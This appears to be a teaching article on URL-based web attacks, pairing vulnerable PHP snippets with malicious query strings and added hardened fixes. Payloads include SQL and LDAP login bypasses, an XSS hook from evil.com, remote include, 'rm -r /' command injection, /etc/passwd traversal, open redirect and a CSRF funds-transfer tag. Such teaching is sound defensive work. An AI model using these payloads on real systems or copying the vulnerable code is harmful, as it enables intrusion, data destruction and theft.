Hacks that work just by changing the URL
- Each section gives one legitimate and one malicious example
- Some examples require URL encoding to work (usually done automatically by the browser)
SQL Injection
code:
    $username = $_POST['username'];
    $pw = $_GET['password'];
    // values are pasted straight into the SQL string, inside the quotes
    mysql_query("SELECT * FROM userTable WHERE username = '$username' AND password = '$pw'");
exploit (logs in as administrator without knowing password):
    example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
    example.com/?username=Administrator&password=password' or 1=1--
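The fix is to keep data out of the SQL text altogether. The following is an added example, not code from the original post: the same login written with a PDO prepared statement and a stored password hash. The table name `userTable` comes from the snippet above; the `password_hash` column, the DSN and the credentials are assumptions.

```php
<?php
// Added example (not from the original post): the login above rewritten with
// PDO prepared statements, so the request values can never alter the query.
// Assumed: userTable has columns username and password_hash (from password_hash()).
$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);

function login(PDO $pdo, string $username, string $password): bool
{
    // The driver sends the SQL and the values separately, so
    // "password' or 1=1--" is just a wrong password, never SQL.
    $stmt = $pdo->prepare('SELECT password_hash FROM userTable WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();

    // Constant-time check against the stored bcrypt hash.
    return $hash !== false && password_verify($password, $hash);
}

// Credentials come from the POST body only; a password in a GET URL ends up in
// browser history, proxy logs and Referer headers.
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
var_dump(login($pdo, $username, $password));
```

Note that the original snippet also compares the password in clear text; with a hashed column the query only fetches the hash, and the comparison happens in `password_verify()`, so even a read-only injection elsewhere would not expose passwords.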
Cross Site Scripting (XSS)
If you are curious about XSS, see my article ‘Guide in understanding XSS – XSS payloads, attack vectors, BeEF hooking, MiTM with Shank and some history’
code:
    $nickname = $_GET['nickname'];
    echo "Your nickname is $nickname\n";
exploit (registers the visiting user as a zombie in BeEF):
    example.com/?nickname=Karrax
    example.com/?nickname=<script src="evil.com/beefmagic.js.php"></script>
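The defence is output encoding for the context the value is written into. This is an added example, not code from the original post; the `h()` helper name and the CSP header are my additions.

```php
<?php
// Added example (not from the original post): output encoding for the nickname echo.
// Encode at the point of output, for the context the value lands in (HTML body here).
function h(string $s): string
{
    // ENT_QUOTES also encodes ' so the value is safe inside single-quoted attributes;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$nickname = $_GET['nickname'] ?? '';
header('Content-Type: text/html; charset=UTF-8');
// Defence in depth: if encoding is ever missed somewhere, a CSP still stops the
// browser from loading script from a host other than this one.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");

echo 'Your nickname is ' . h($nickname) . "\n";
// For the payload above the browser now renders the tag as visible text
// (&lt;script src=...&gt;) and executes nothing.
```

`htmlspecialchars()` is only right for HTML body and attribute contexts; a value written into a JavaScript block, a URL or a CSS property needs the encoder for that context instead.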
Remote code execution
code:
    include($_GET["module"].".php");
exploit (downloads and runs arbitrary code):
    example.com/?module=frontpage
    example.com/?module=pastebin.com/mymaliciousscript
Command injection
code:
    echo shell_exec('cat '.$_GET['filename']);
exploit (tries to delete all files from root directory):
    example.com/?filename=readme.txt
    example.com/?filename=readme.txt;rm -r /
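Two ways to serve the file without letting the name reach a shell, as an added example that is not from the original post. The document directory `/var/www/docs` and the function names are assumptions.

```php
<?php
// Added example (not from the original post): serve a file by name without
// letting the request value reach a shell.

// 1. Preferred: no shell at all. Read the file with PHP after confining the
//    name to one path component inside a fixed directory.
function readDocument(string $name): ?string
{
    $base = '/var/www/docs';                      // assumed document directory
    if (!preg_match('/\A[A-Za-z0-9_.-]+\z/', $name) || str_contains($name, '..')) {
        return null;                              // rejects "readme.txt;rm -r /", "../x", etc.
    }
    $path = $base . '/' . $name;
    return is_file($path) ? file_get_contents($path) : null;
}

// 2. If a shell command is unavoidable, quote each argument with escapeshellarg()
//    so the whole value becomes a single literal argument: 'readme.txt;rm -r /'.
function catViaShell(string $name): string
{
    $arg = escapeshellarg('/var/www/docs/' . basename($name));
    return shell_exec('cat -- ' . $arg) ?: '';
}

$name = $_GET['filename'] ?? '';
$doc  = readDocument($name);
http_response_code($doc === null ? 404 : 200);
echo $doc ?? "Not found\n";
```

Option 1 is the one to reach for: an allowlisted character set plus a fixed base directory removes the shell, the metacharacter question and the traversal question at once. `escapeshellarg()` in option 2 protects the argument boundary, but it does not stop a user from naming any file the web server account can read.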
Code injection
code:
    $myvar = "varname";
    $x = $_GET['arg'];
    // the request value is interpolated into the string that eval() runs as PHP
    eval("\$$myvar = $x;");
exploit (injects a phpinfo() call, which prints very useful attack info on screen):
    example.com/?arg=1
    example.com/?arg=1; phpinfo()
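The `eval()` is not needed for what the snippet is trying to do, which is to assign a request value to a variable. Below is an added example, not code from the original post, that does the assignment directly after validating the value as an integer; `readIntArg()` is a name I chose.

```php
<?php
// Added example (not from the original post): the assignment done without eval().
// The request value is validated and stored as data; it is never parsed as PHP.
function readIntArg(array $query, string $key, int $min = 0, int $max = PHP_INT_MAX): ?int
{
    $raw = $query[$key] ?? null;
    // FILTER_VALIDATE_INT returns false for "1; phpinfo()", "1e3", " 1", null, etc.
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $value === false ? null : $value;
}

$myvar = readIntArg($_GET, 'arg');   // int or null, never code
if ($myvar === null) {
    http_response_code(400);
    exit("Invalid arg\n");
}
echo "arg = $myvar\n";
```

If the variable name itself must be chosen at run time, look the name up in a fixed array of permitted keys and assign into that array; there is no input shape for which `eval()` on request data is the right tool.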
LDAP injection
code:
    $username = $_GET['username'];
    $password = $_GET['password'];
    // both values are pasted unescaped into the LDAP search filter
    ldap_search($ldap, $baseDn, "(&(cn=$username)(password=$password))");
exploit (logs in without knowing admin password):
    example.com/?username=admin&password=adminadmin
    example.com/?username=admin&password=*
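Two things fix this: filter values are escaped with `ldap_escape()`, and the password is never placed in a filter at all; the directory verifies it through a bind as the found user. This is an added example, not code from the original post. The server URI, the base DN and the `objectClass=person` filter are assumptions.

```php
<?php
// Added example (not from the original post): escaped filter plus an
// authenticated bind instead of a password comparison inside the filter.
// Assumed: ldap://ldap.example.com, users under ou=people,dc=example,dc=com.
function ldapLogin(string $username, string $password): bool
{
    if ($password === '') {
        return false;  // an empty password is an anonymous bind on many servers, and it succeeds
    }
    $ds = ldap_connect('ldap://ldap.example.com');
    ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);

    // Escape filter metacharacters: "*" becomes "\2a", "(" becomes "\28", and so on,
    // so a username of "*" or "admin)(cn=*" cannot widen the search.
    $cn     = ldap_escape($username, '', LDAP_ESCAPE_FILTER);
    $filter = "(&(objectClass=person)(cn=$cn))";
    $res     = ldap_search($ds, 'ou=people,dc=example,dc=com', $filter, ['dn']);
    $entries = ldap_get_entries($ds, $res);
    if ($entries['count'] !== 1) {
        return false;  // no such user
    }

    // Let the directory check the password by binding as that DN.
    // ldap_bind() emits a warning on failure; @ keeps it out of the response.
    return @ldap_bind($ds, $entries[0]['dn'], $password);
}

// credentials from the POST body, not the query string
var_dump(ldapLogin($_POST['username'] ?? '', $_POST['password'] ?? ''));
```

The bind step is what removes the `password=*` trick entirely: a wildcard is not a password the directory will bind with, and `userPassword` attributes are normally not readable through a search anyway.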
Path traversal
code:
    include("./" . $_GET['page']);
exploit (fetches /etc/passwd):
    example.com/?page=front.php
    example.com/?page=../../../../../../../../etc/passwd
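The same fix covers both this path traversal and the remote-include "module" example earlier: the request value is a key into a fixed map of files and is never used as a path. The following is an added example, not code from the original post; the pages directory and the keys in the map are assumptions, with `frontpage` and `front.php` taken from the two snippets.

```php
<?php
// Added example (not from the original post), for both the ?module= and ?page=
// includes above. The request value selects an entry from a fixed map, so neither
// "../../etc/passwd" nor a remote URL can ever be included.
// Assumed layout: page files live in /var/www/app/pages.
const PAGES = [
    'frontpage' => 'frontpage.php',
    'front'     => 'front.php',
    'faq'       => 'faq.php',
];

function resolvePage(string $key): ?string
{
    if (!isset(PAGES[$key])) {
        return null;                               // unknown key: 404, not a file lookup
    }
    $base = realpath('/var/www/app/pages');
    $path = realpath($base . '/' . PAGES[$key]);
    // Belt and braces: even if the map is edited badly, refuse anything that
    // resolves outside the pages directory (realpath() also follows symlinks).
    if ($path === false || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$path = resolvePage($_GET['page'] ?? 'frontpage');
if ($path === null) {
    http_response_code(404);
    exit("No such page\n");
}
include $path;
```

On top of this, `allow_url_include` should be off in php.ini (it is off by default) so that `include` cannot fetch over HTTP at all, which makes the pastebin example fail even in code that still builds paths from input.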
Redirect/Forward attack
code:
    $redirectUrl = $_GET['url'];
    header("Location: $redirectUrl");
exploit (sends the user from your page to an evil page):
    example.com/?url=example.com/faq.php
    example.com/?url=evil.com/sploitCode.php
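A redirect target should be a local path or an exact match on an allowlisted host; everything else falls back to the front page. This is an added example, not code from the original post; `safeRedirectTarget()` and the `example.com` allowlist are my assumptions.

```php
<?php
// Added example (not from the original post): only redirect to a local path or
// to an allowlisted https host; anything else goes to "/".
function safeRedirectTarget(string $url, array $allowedHosts = ['example.com']): string
{
    $parts = parse_url($url);
    if ($parts === false) {
        return '/';
    }
    // Relative path on this site: must start with exactly one "/".
    // "//evil.com" is a protocol-relative URL and "/\evil.com" is treated the
    // same way by some browsers, so both are refused.
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        $path = $parts['path'] ?? '';
        if ($path === '' || $path[0] !== '/'
            || str_starts_with($path, '//') || str_starts_with($path, '/\\')) {
            return '/';
        }
        return $url;
    }
    // Absolute URL: require https and an exact host match (no "example.com.evil.com").
    if (($parts['scheme'] ?? '') === 'https'
        && in_array(strtolower($parts['host'] ?? ''), $allowedHosts, true)) {
        return $url;
    }
    return '/';
}

header('Location: ' . safeRedirectTarget($_GET['url'] ?? '/'), true, 302);
exit;
```

With this check the legitimate link is written as `?url=/faq.php` rather than `?url=example.com/faq.php`: a bare hostname has no scheme and no leading slash, so it is refused rather than guessed at. The simplest variant, where it fits the application, is to accept no URL at all and redirect by a short key looked up in a table.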
Failure to Restrict URL Access
code:
N/A. Lacking .htaccess ACL or similar access control. Allows user to guess or by other
means discover the location of content that should only be accessible while logged in.
exploit:
    example.com/users/showUser.php
    example.com/admins/editUser.php
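Whether or not an `.htaccess` rule is in place, each protected script should enforce the check itself. The following is an added example, not code from the original post: a `requireRole()` helper (my name) that every admin page requires before doing anything else. It assumes the login code stored `user_id` and `role` in the session.

```php
<?php
// Added example (not from the original post): a check every protected script
// runs first. The decision comes from the server-side session, not from the
// URL, so knowing that /admins/editUser.php exists is not enough to use it.
// Assumed: login stored $_SESSION['user_id'] and $_SESSION['role'].
function requireRole(string $role): void
{
    session_start();
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        exit("Login required\n");
    }
    if (($_SESSION['role'] ?? '') !== $role) {
        http_response_code(403);   // logged in, but not permitted here
        // Log the refusal: repeated hits on admin URLs are worth alerting on.
        error_log(sprintf('denied %s to user %s from %s',
            $_SERVER['REQUEST_URI'] ?? '?', $_SESSION['user_id'], $_SERVER['REMOTE_ADDR'] ?? '?'));
        exit("Forbidden\n");
    }
}

// admins/editUser.php
requireRole('admin');
// ... admin-only code follows
```

The check belongs in the script (or in a front controller that runs before routing), not only in a web-server rule, because the rule is lost the moment files are copied to another server or the directory is renamed.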
Cross-Site Request Forgery
code:
N/A. Code lacks page to page secret to validate that request comes from current site.
Implement a secret that is transmitted and validated between pages.
exploit:
    Legal submit: example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
    On evil page: <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=evilAccount#" width="0" height="0">
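The page-to-page secret described above, as an added example that is not code from the original post: a random token stored in the session, placed in the form, and checked by the handler with a constant-time comparison. The form field names and the `/app/transferFunds` handler path are taken from the exploit above; the function names are my assumptions.

```php
<?php
// Added example (not from the original post): a per-session secret that the
// form carries and the handler verifies. A page on evil.com cannot read the
// token, so its forged <img> request arrives without it and is refused.
session_start();

function csrfToken(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));  // 256-bit random secret
    }
    return $_SESSION['csrf'];
}

function csrfCheck(?string $token): bool
{
    // hash_equals() compares in constant time; missing tokens fail closed.
    return is_string($token) && isset($_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], $token);
}

// Form page: embed the token. The transfer is a POST; a GET that changes state
// is exactly what an <img> tag can trigger.
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
    $t = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    echo '<form method="post" action="/app/transferFunds">'
       . '<input type="hidden" name="csrf" value="' . $t . '">'
       . '<input name="amount"><input name="destinationAccount">'
       . '<button>Transfer</button></form>';
    exit;
}

// Handler (/app/transferFunds): refuse anything without a matching token.
if (!csrfCheck($_POST['csrf'] ?? null)) {
    http_response_code(403);
    exit("Bad or missing CSRF token\n");
}
// ... perform the transfer with $_POST['amount'] and $_POST['destinationAccount']
```

Setting the session cookie with `SameSite=Lax` (or `Strict`) adds a second layer, since the browser then leaves the cookie off cross-site requests such as the `<img>` above; the token remains the primary control because older clients ignore the attribute.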
Buffer overflow (technically by accessing a URL, but implemented with Metasploit)
code:
N/A. Vulnerability in the webserver code itself. Standard buffer overflow.
exploit:
http://www.exploit-db.com/exploits/16798/